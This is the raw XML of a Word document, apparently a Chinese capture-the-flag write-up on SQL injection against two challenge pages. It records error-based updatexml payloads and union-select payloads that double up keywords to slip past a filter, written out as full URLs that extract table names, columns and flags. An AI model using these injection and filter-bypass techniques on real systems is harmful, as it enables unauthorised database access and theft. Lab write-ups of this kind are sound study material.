      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E49311D" w14:textId="54EA5761" w:rsidR="00E3657E" w:rsidRDefault="00E3657E" w:rsidP="00C1774A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25404710" wp14:editId="57299BD4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A67" w14:textId="246B5D72" w:rsidR="00F76C41" w:rsidRDefault="00F76C41" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>多次检测无果之后</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>搜</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>wp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ECAD3D" w14:textId="012D9046" w:rsidR="00F76C41" w:rsidRDefault="00F76C41" w:rsidP="00C1774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学到了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length(‘union’)==0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可以检测过滤，union不能用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F02380C" w14:textId="77777777" w:rsidR="00F76C41" w:rsidRDefault="00F76C41" w:rsidP="00C1774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通过使用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updatexml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绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0484CD" w14:textId="16495C3D" w:rsidR="00F76C41" w:rsidRDefault="00F76C41" w:rsidP="00C1774A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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F76C41">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>updatexml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F76C41">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F76C41">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4F4F4F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1,concat(0x7e,(SELECT @@version),0x7e),1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17644117" w14:textId="0A3CEC30" w:rsidR="00434011" w:rsidRDefault="00434011" w:rsidP="00C1774A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order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by曝出字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269A6561" w14:textId="625F72FC" w:rsidR="00F76C41" w:rsidRDefault="00434011" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BF0F6AC" wp14:editId="548891AC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A02" w14:textId="59726236" w:rsidR="00434011" w:rsidRDefault="00434011" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>开始注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBAD50A" w14:textId="777654B9" w:rsidR="00434011" w:rsidRDefault="00434011" w:rsidP="00C1774A">
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://123.206.87.240:9004/Once_More.php?id=1%27%20and%20updatexml(1,concat(%27~%27,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20ta</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:lastRenderedPageBreak/>
          <w:t>ble_schema=database()%20and%20table_name%20=%20%27flag2%27),%27~%27),3)%20%23</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="119D29EE" w14:textId="4A70E5D6" w:rsidR="00434011" w:rsidRDefault="00434011" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3232C8F8" wp14:editId="1C770CCD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2605" w14:textId="164069AA" w:rsidR="00434011" w:rsidRDefault="00434011" w:rsidP="00C1774A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>拿到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1931F47D" w14:textId="40226E68" w:rsidR="00434011" w:rsidRDefault="00434011" w:rsidP="00C1774A">
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://123.206.87.240:9004/Once_More.php?id=1%27%20and%20updatexml(1,concat(%27~%27,(select%20flag2%20from%20flag2),%27~%27),3)%20%23</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="153D25A3" w14:textId="65D99D9A" w:rsidR="00434011" w:rsidRPr="001521BD" w:rsidRDefault="00434011" w:rsidP="00C1774A">
      <w:pPr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268CD951" wp14:editId="7DE89DC8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4011" w:rsidRPr="00152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58"/>
    <w:rsid w:val="001427BE"/>
    <w:rsid w:val="001521BD"/>
    <w:rsid w:val="001A6390"/>
    <w:rsid w:val="002072B9"/>
    <w:rsid w:val="002E7DA8"/>
    <w:rsid w:val="00434011"/>
    <w:rsid w:val="004F1C58"/>
    <w:rsid w:val="00500F0D"/>
    <w:rsid w:val="00A633C3"/>
    <w:rsid w:val="00C02D3D"/>
    <w:rsid w:val="00C1774A"/>
    <w:rsid w:val="00E3657E"/>
    <w:rsid w:val="00F7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0FF77"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CD2A8688-8A33-429E-9CD3-ECCBA77A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639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A6390"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a5">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001521BD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00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23.206.87.240:9004/1ndex.php?id=-1%27uniunionon%20selselectect%201,(selecselectt%20table_name%20from%20infoorrmation_schema.tables%20where%20table_schema=database()%20limit%200,1)%23" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://123.206.87.240:9004/1ndex.php?id=-1%27uniunionon%20selselectect%201,concat(flag1)%20%20from%20flag1%23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://123.206.87.240:9004/1ndex.php?id=-1%27uniunionon%20selselectect%201,(selecselectt%20column_name%20from%20infoorrmation_schema.columns%20where%20table_name=%27flag1%27%20limit%201,1)%23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://123.206.87.240:9004/1ndex.php?id=-1%27uniunionon%20selselectect%201,(selecselectt%20column_name%20from%20infoorrmation_schema.columns%20where%20table_name=%27flag1%27%20limit%200,1)%23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123.206.87.240:9004/Once_More.php?id=1%27%20and%20updatexml(1,concat(%27~%27,(select%20flag2%20from%20flag2),%27~%27),3)%20%2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://123.206.87.240:9004/1ndex.php?id=-1%27ununionion%20selecselectt%201,concat(address)%20from%20flag1%23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hyperlink" Target="http://123.206.87.240:9004/1ndex.php?id=-1%27uniunionon%20selselectect%201,concat(f)%20%20from%20flag1%23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3.206.87.240:9004/1ndex.php?id=-1%27ununionion%20selecselectt%201,column_name%20from%20infoorrmation_schema.columns%20where%20table_name=%27flag1%27limit%201,1%20%23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123.206.87.240:9004/Once_More.php?id=1%27%20and%20updatexml(1,concat(%27~%27,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20and%20table_name%20=%20%27flag2%27),%27~%27),3)%20%23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606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243968321@qq.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>243968321@qq.com</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-20T10:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-21T10:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>